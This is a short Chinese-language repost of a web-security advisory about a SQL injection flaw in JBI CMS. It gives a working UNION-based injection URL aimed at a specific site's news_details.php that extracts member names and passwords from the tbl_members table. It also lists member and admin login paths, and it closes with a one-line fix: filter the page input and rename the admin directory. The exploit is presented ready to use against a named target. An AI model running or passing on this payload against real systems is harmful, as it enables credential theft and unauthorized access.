JBI CMS 程序过滤不严导致SQL注入攻击。
Exploit :
http://www.chinasg.tk/news_details.php?id=-1+union+select+1,2,3,group_concat(name,0x3a,password),5,6,7+from+tbl_members
Login page for members : /member.php
Login page for Admins : /admin
www.2cto.com 提供修复方案:
过滤news_details.php页面,修改后台目录
查看更多关于JBI CMS SQL注射漏洞及修复 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11097